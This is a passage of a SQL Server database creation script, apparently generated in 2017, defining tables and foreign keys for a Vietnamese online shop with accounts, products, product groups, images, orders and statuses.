	[MA_TAIKHOAN] [int] IDENTITY(1,1) NOT NULL,
	[MA_TRANGTHAI] [int] NOT NULL,
	[HOTEN] [nvarchar](100) NULL,
	[TAIKHOAN] [varchar](10) NULL,
	[MATKHAU] [varchar](1000) NULL,
	[DIACHI] [ntext] NULL,
	[THUTU] [nvarchar](15) NULL,
	[DIENTHOAI] [int] NULL,
	[EMAIL] [nvarchar](100) NULL,
 CONSTRAINT [PK_KHACH_HANG] PRIMARY KEY NONCLUSTERED 
(
	[MA_TAIKHOAN] ASC
)WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY]
) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY]

GO
SET ANSI_PADDING OFF
GO
/****** Object:  Table [dbo].[LUOTTRUYCAP]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE TABLE [dbo].[LUOTTRUYCAP](
	[ID] [int] IDENTITY(1,1) NOT NULL,
	[THOIGIAN] [datetime] NULL,
	[SOTRUYCAP] [int] NULL,
 CONSTRAINT [PK_LUOTTRUYCAP] PRIMARY KEY NONCLUSTERED 
(
	[ID] ASC
)WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY]
) ON [PRIMARY]

GO
/****** Object:  Table [dbo].[MODULE]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
SET ANSI_PADDING ON
GO
CREATE TABLE [dbo].[MODULE](
	[MA_MODULE] [int] NOT NULL,
	[MA_TRANGTHAI] [int] NOT NULL,
	[TEN_MODULE] [char](100) NULL,
	[THUTU] [numeric](5, 0) NULL,
	[GIATRI_THAMSO] [nvarchar](100) NULL,
	[TEN_THAMSO] [nvarchar](100) NULL,
 CONSTRAINT [PK_MODULE] PRIMARY KEY NONCLUSTERED 
(
	[MA_MODULE] ASC
)WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY]
) ON [PRIMARY]

GO
SET ANSI_PADDING OFF
GO
/****** Object:  Table [dbo].[NHOM_HINH]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE TABLE [dbo].[NHOM_HINH](
	[MANHOM_HINH] [int] IDENTITY(1,1) NOT NULL,
	[MA_TRANGTHAI] [int] NOT NULL,
	[TENNHOM_HINH] [nvarchar](100) NULL,
	[AVATAR] [nvarchar](150) NULL,
	[URL] [ntext] NULL,
 CONSTRAINT [PK_NHOM_HINH] PRIMARY KEY NONCLUSTERED 
(
	[MANHOM_HINH] ASC
)WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY]
) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY]

GO
/****** Object:  Table [dbo].[NHOM_SANPHAM]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE TABLE [dbo].[NHOM_SANPHAM](
	[MANHOM_SANPHAM] [int] IDENTITY(1,1) NOT NULL,
	[MA_TRANGTHAI] [int] NOT NULL,
	[TENNHOM_SANPHAM] [nvarchar](100) NULL,
	[URL] [ntext] NULL,
	[THUTU] [numeric](5, 0) NULL,
	[MANHOM_CHA] [int] NULL,
	[SLIDE_SHOW] [bit] NULL,
	[AVATAR] [nvarchar](150) NULL,
 CONSTRAINT [PK_NHOM_SP] PRIMARY KEY NONCLUSTERED 
(
	[MANHOM_SANPHAM] ASC
)WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY]
) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY]

GO
/****** Object:  Table [dbo].[QUANTRI_TAIKHOAN]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
SET ANSI_PADDING ON
GO
CREATE TABLE [dbo].[QUANTRI_TAIKHOAN](
	[MA_TAIKHOAN] [int] IDENTITY(1,1) NOT NULL,
	[MA_ROLE] [int] NOT NULL,
	[MA_TRANGTHAI] [int] NOT NULL,
	[HOTEN] [nvarchar](100) NULL,
	[TAIKHOAN] [varchar](10) NULL,
	[MATKHAU] [varchar](1000) NULL,
	[DIACHI] [ntext] NULL,
	[DIENTHOAI] [nvarchar](15) NULL,
	[EMAIL] [nvarchar](100) NULL,
	[AVATAR] [varchar](100) NULL,
 CONSTRAINT [PK_NGUOI_DUNG] PRIMARY KEY NONCLUSTERED 
(
	[MA_TAIKHOAN] ASC
)WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY]
) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY]

GO
SET ANSI_PADDING OFF
GO
/****** Object:  Table [dbo].[ROLE]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE TABLE [dbo].[ROLE](
	[MA_ROLE] [int] NOT NULL,
	[TEN_ROLE] [nvarchar](100) NULL,
 CONSTRAINT [PK_NHOM_QUYEN] PRIMARY KEY NONCLUSTERED 
(
	[MA_ROLE] ASC
)WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY]
) ON [PRIMARY]

GO
/****** Object:  Table [dbo].[SANPHAM]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE TABLE [dbo].[SANPHAM](
	[MA_SANPHAM] [int] IDENTITY(1,1) NOT NULL,
	[MA_TRANGTHAI] [int] NOT NULL,
	[TEN_SANPHAM] [nvarchar](100) NOT NULL,
	[MOTA] [ntext] NULL,
	[THUTU] [numeric](5, 0) NULL,
	[NOIDUNG] [ntext] NULL,
	[SLIDE_SHOW] [bit] NULL,
	[URL] [ntext] NOT NULL,
	[GIA] [decimal](10, 0) NULL,
	[AVATAR] [nvarchar](150) NULL,
	[NGAY_DANG] [datetime] NULL,
	[UU_TIEN] [bit] NULL,
	[GIA_KHUYENMAI] [decimal](10, 0) NULL,
	[MA_NHOM_SAN_PHAM] [int] NULL,
 CONSTRAINT [PK_SANPHAM] PRIMARY KEY NONCLUSTERED 
(
	[MA_SANPHAM] ASC
)WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY]
) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY]

GO
/****** Object:  Table [dbo].[SANPHAM_CHITIET]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE TABLE [dbo].[SANPHAM_CHITIET](
	[MA_SANPHAM] [int] NOT NULL,
	[MANHOM_SANPHAM] [int] NOT NULL,
 CONSTRAINT [PK_SP_NHOMSP] PRIMARY KEY CLUSTERED 
(
	[MA_SANPHAM] ASC,
	[MANHOM_SANPHAM] ASC
)WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY]
) ON [PRIMARY]

GO
/****** Object:  Table [dbo].[THONGTINCHUNG]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE TABLE [dbo].[THONGTINCHUNG](
	[ID] [int] NOT NULL,
	[TENCONGTY] [nvarchar](100) NULL,
	[DIENTHOAI] [nvarchar](15) NULL,
	[EMAIL] [nvarchar](100) NULL,
	[DIACHI] [ntext] NULL,
	[LINK_FACE] [nvarchar](100) NULL,
	[LINK_SKYPE] [nvarchar](100) NULL,
	[LINK_TWITTER] [nvarchar](100) NULL,
	[LINK_GOOGLE] [nvarchar](100) NULL,
	[GHICHU] [ntext] NULL,
 CONSTRAINT [PK_THONGTINCHUNG] PRIMARY KEY CLUSTERED 
(
	[ID] ASC
)WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY]
) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY]

GO
/****** Object:  Table [dbo].[TRANGTHAI]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE TABLE [dbo].[TRANGTHAI](
	[MA_TRANGTHAI] [int] NOT NULL,
	[TEN_TRANGTHAI] [nvarchar](100) NULL,
	[MOTA] [ntext] NULL,
 CONSTRAINT [PK_TRANGTHAI] PRIMARY KEY NONCLUSTERED 
(
	[MA_TRANGTHAI] ASC
)WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY]
) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY]

GO
/****** Object:  Table [dbo].[TRANGTHAI_DONHANG]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE TABLE [dbo].[TRANGTHAI_DONHANG](
	[MA_TRANGTHAI_DONHANG] [int] NOT NULL,
	[TEN_TRANGTHAI_DONHANG] [nvarchar](100) NULL,
	[MOTA_TRANGTHAI_DONHANG] [ntext] NULL,
 CONSTRAINT [PK_TRANGTHAI_DONHANG] PRIMARY KEY NONCLUSTERED 
(
	[MA_TRANGTHAI_DONHANG] ASC
)WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY]
) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY]

GO
ALTER TABLE [dbo].[DONHANG_CHITIET]  WITH CHECK ADD  CONSTRAINT [FK_DON_HANG_DON_HANG__DON_HANG] FOREIGN KEY([MA_DONHANG])
REFERENCES [dbo].[DONHANG] ([MA_DONHANG])
GO
ALTER TABLE [dbo].[DONHANG_CHITIET] CHECK CONSTRAINT [FK_DON_HANG_DON_HANG__DON_HANG]
GO
ALTER TABLE [dbo].[DONHANG_CHITIET]  WITH CHECK ADD  CONSTRAINT [FK_DON_HANG_DON_HANG__SANPHAM] FOREIGN KEY([MA_SANPHAM])
REFERENCES [dbo].[SANPHAM] ([MA_SANPHAM])
GO
ALTER TABLE [dbo].[DONHANG_CHITIET] CHECK CONSTRAINT [FK_DON_HANG_DON_HANG__SANPHAM]
GO
ALTER TABLE [dbo].[HINH]  WITH CHECK ADD  CONSTRAINT [FK_HINH_RELATIONS_TRANGTHA] FOREIGN KEY([MA_TRANGTHAI])
REFERENCES [dbo].[TRANGTHAI] ([MA_TRANGTHAI])
GO
ALTER TABLE [dbo].[HINH] CHECK CONSTRAINT [FK_HINH_RELATIONS_TRANGTHA]
GO
ALTER TABLE [dbo].[KHACHHANG_DANHGIA]  WITH CHECK ADD  CONSTRAINT [FK_DANH_GIA_RELATIONS_SANPHAM] FOREIGN KEY([MA_SANPHAM])
REFERENCES [dbo].[SANPHAM] ([MA_SANPHAM])
GO
ALTER TABLE [dbo].[KHACHHANG_DANHGIA] CHECK CONSTRAINT [FK_DANH_GIA_RELATIONS_SANPHAM]
GO
ALTER TABLE [dbo].[KHACHHANG_TAIKHOAN]  WITH CHECK ADD  CONSTRAINT [FK_KHACH_HA_RELATIONS_TRANGTHA] FOREIGN KEY([MA_TRANGTHAI])
REFERENCES [dbo].[TRANGTHAI] ([MA_TRANGTHAI])
GO
ALTER TABLE [dbo].[KHACHHANG_TAIKHOAN] CHECK CONSTRAINT [FK_KHACH_HA_RELATIONS_TRANGTHA]
GO
ALTER TABLE [dbo].[MODULE]  WITH CHECK ADD  CONSTRAINT [FK_MODULE_RELATIONS_TRANGTHA] FOREIGN KEY([MA_TRANGTHAI])
REFERENCES [dbo].[TRANGTHAI] ([MA_TRANGTHAI])
GO
ALTER TABLE [dbo].[MODULE] CHECK CONSTRAINT [FK_MODULE_RELATIONS_TRANGTHA]
GO
ALTER TABLE [dbo].[NHOM_HINH]  WITH CHECK ADD  CONSTRAINT [FK_NHOM_HIN_RELATIONS_TRANGTHA] FOREIGN KEY([MA_TRANGTHAI])
REFERENCES [dbo].[TRANGTHAI] ([MA_TRANGTHAI])
GO
ALTER TABLE [dbo].[NHOM_HINH] CHECK CONSTRAINT [FK_NHOM_HIN_RELATIONS_TRANGTHA]
GO
ALTER TABLE [dbo].[NHOM_SANPHAM]  WITH CHECK ADD  CONSTRAINT [FK_NHOM_SP_RELATIONS_TRANGTHA] FOREIGN KEY([MA_TRANGTHAI])
REFERENCES [dbo].[TRANGTHAI] ([MA_TRANGTHAI])
GO
ALTER TABLE [dbo].[NHOM_SANPHAM] CHECK CONSTRAINT [FK_NHOM_SP_RELATIONS_TRANGTHA]
GO
ALTER TABLE [dbo].[QUANTRI_TAIKHOAN]  WITH CHECK ADD  CONSTRAINT [FK_NGUOI_DU_RELATIONS_NHOM_QUY] FOREIGN KEY([MA_ROLE])
REFERENCES [dbo].[ROLE] ([MA_ROLE])
GO
ALTER TABLE [dbo].[QUANTRI_TAIKHOAN] CHECK CONSTRAINT [FK_NGUOI_DU_RELATIONS_NHOM_QUY]
GO
ALTER TABLE [dbo].[QUANTRI_TAIKHOAN]  WITH CHECK ADD  CONSTRAINT [FK_NGUOI_DU_RELATIONS_TRANGTHA] FOREIGN KEY([MA_TRANGTHAI])
REFERENCES [dbo].[TRANGTHAI] ([MA_TRANGTHAI])
GO
ALTER TABLE [dbo].[QUANTRI_TAIKHOAN] CHECK CONSTRAINT [FK_NGUOI_DU_RELATIONS_TRANGTHA]
GO
ALTER TABLE [dbo].[SANPHAM]  WITH CHECK ADD  CONSTRAINT [FK_SANPHAM_RELATIONS_TRANGTHA] FOREIGN KEY([MA_TRANGTHAI])
REFERENCES [dbo].[TRANGTHAI] ([MA_TRANGTHAI])
GO
ALTER TABLE [dbo].[SANPHAM] CHECK CONSTRAINT [FK_SANPHAM_RELATIONS_TRANGTHA]
GO
ALTER TABLE [dbo].[SANPHAM_CHITIET]  WITH CHECK ADD  CONSTRAINT [FK_SP_NHOMS_SP_NHOMSP_NHOM_SP] FOREIGN KEY([MANHOM_SANPHAM])
REFERENCES [dbo].[NHOM_SANPHAM] ([MANHOM_SANPHAM])
GO
ALTER TABLE [dbo].[SANPHAM_CHITIET] CHECK CONSTRAINT [FK_SP_NHOMS_SP_NHOMSP_NHOM_SP]
GO
ALTER TABLE [dbo].[SANPHAM_CHITIET]  WITH CHECK ADD  CONSTRAINT [FK_SP_NHOMS_SP_NHOMSP_SANPHAM] FOREIGN KEY([MA_SANPHAM])
REFERENCES [dbo].[SANPHAM] ([MA_SANPHAM])
GO
ALTER TABLE [dbo].[SANPHAM_CHITIET] CHECK CONSTRAINT [FK_SP_NHOMS_SP_NHOMSP_SANPHAM]
GO
